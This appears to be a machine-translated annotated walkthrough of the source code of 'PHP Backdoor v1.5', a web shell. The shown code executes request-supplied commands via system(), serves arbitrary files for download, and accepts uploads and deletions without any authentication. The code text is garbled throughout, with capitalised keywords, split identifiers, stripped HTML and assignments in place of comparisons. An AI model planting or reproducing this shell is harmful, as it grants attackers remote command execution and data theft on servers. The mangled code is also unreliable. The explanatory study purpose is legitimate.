Explanation of PHP webshell files
PHP Backdoor Version 1.5 is a php Backdoor program compiled by sirius_black/lotfree team. here, we will perform a simple analysis on it and take notes for learning php, the command executed by the backdoor depends on the user's permissions when installing the web server and php. if it is an administrator, various operating system commands can be executed. Below is a comment on a backdoor program
-
-
- Function good_link ($ link)
- {
- $ Link = ereg_replace ("/+", "/", $ link );
- $ Link = ereg_replace ("/[^/(..)] +/\. \.", "/", $ link );
- $ Link = ereg_replace ("/+", "/", $ link );
- If (! Strncmp ($ link, "./", 2) & strlen ($ link)> 2) $ link = substr ($ link, 2 );
- If ($ link = "") $ link = ".";
- Return $ link;
- }
- // $ _ REQUEST is used to obtain the data submitted to this file.
- $ Dir = isset ($ _ REQUEST ['dir'])? $ _ REQUEST ['dir']: "."; // if no dir is defined, use the default value "."
- $ Dir = good_link ($ dir );
- $ Rep = opendir ($ dir); // open the path handle specified by dir
- Chdir ($ dir); // switch to the directory specified by dir
- If (isset ($ _ REQUEST ["down"]) & $ _ REQUEST ["down"]! = "") // If down is defined
- {
- Header ("Content-Type: application/octet-stream ");
- Header ("Content-Length:". filesize ($ _ REQUEST ["down"]);
- Header ("Content-Disposition: attachment; filename =". basename ($ _ REQUEST ["down"]);
- Readfile ($ _ REQUEST ["down"]); // read the file to the buffer zone
- Exit ();
- }
- ?>
- Lotfree php Backdoor v1.5, easy to trace yeetrack.com
-
- Echo "the current absolute path is:". Getcwd ()."
\ N "; // Obtain the current absolute path
- Echo"Dir = '$ dir'
\ N ";
- Echo "current directory, file list!
\ N ";
- // If the command to be executed has been entered
- If (isset ($ _ REQUEST ['cmd']) & $ _ REQUEST ['cmd']! = "")
- {
- Echo"
\ N ";
- System ($ _ REQUEST ['cmd']); // execute the entered command on the server and display the execution result
- Echo"
\ N ";
- }
- // If a file has been uploaded
- If (isset ($ _ FILES ["fic"] ["name"]) & isset ($ _ POST ["MAX_FILE_SIZE"]) // Obtain The post file, save to current directory
- {
- If ($ _ FILES ["fic"] ["size"] <$ _ POST ["MAX_FILE_SIZE"]) // determines whether the file meets the size specifications
- {
- If (move_uploaded_file ($ _ FILES ["fic"] ["tmp_name"], good_link (". /". $ _ FILES ["fic"] ["name"]) // Save the temporary file to the current directory
- {
- Echo "the file is successfully saved". good_link ("./". $ _ FILES ["fic"] ["name"]). "!
\ N ";
- }
- Else echo "file Upload failed:". $ _ FILES ["fic"] ["error"]."
\ N ";
- }
- Else echo "File too large (the File size exceeds the limit )!
\ N ";
- }
- If (isset ($ _ REQUEST ['rm ']) & $ _ REQUEST ['rm']! = "") // If rm is defined, the specified file is deleted.
- {
- If (unlink ($ _ REQUEST ['rm ']) // unlink is a php file deletion function.
- Echo "successfully deleted". $ _ REQUEST ['rm ']. "!
\ N ";
- Else echo "failed to delete the file
\ N ";
- }
- ?>
-
-
-
-
- $ T_dir = array ();
- $ T_file = array ();
- $ I _dir = 0;
- $ I _file = 0;
- // Input the directory file before reading it cyclically and place it in t_dir and t_file.
- While ($ x = readdir ($ rep ))
- {
- If (is_dir ($ x) // if the directory is currently being processed
- $ T_dir [$ I _dir ++] = $ x;
- Else // if the file is currently being processed
- $ T_file [$ I _file ++] = $ x;
- }
- Closedir ($ rep); // Close the directory handle opened by opendir
- While (1) // enter the directory and file of the current path in a loop
- {
- ?>
-
- // $ _ SERVER ['php _ SELF '] get the current PHP script file name
- If ($ y = each ($ t_file ))
- {
- If ($ y ["key"] % 2 = 0) // if the current processing is key
- Echo "bgcolor = 'lightgreen'> \ n ";
- Else // if the current process is value, that is, the file. This file is displayed and a download link is provided.
- Echo "> \ n ";
- Echo "". $ y ["value"]. "\ n ";
- }
- Else echo "> \ n ";
- ?>
- If ($ y)
- {
- // If it is a file, provide the following link to delete the file
- If ($ y ["key"] % 2 = 0) echo "bgcolor = 'lightgreen '";
- Echo ">Del";
- }
- Else echo "> \ n ";
- ?>
- If (! $ X &&! $ Y)
- Break;
- }
- ?>
-
- If ($ x = each ($ t_dir ))
- {
- $ Name = $ x ["value"]; // Obtain the directory name in the t_dir array
- If ($ name = '.'){}
- Elseif ($ name = '..') echo "UP (parent directory)
\ N "; // displays an UP link to read the list of files in the parent directory.
- Else
- Echo "". $ name. "\ n ";
- }
- ?>
|
|
|
- ? Dir = "> revenirau repertoire d 'Origine
-
- Upload files to the current directory on the server:
|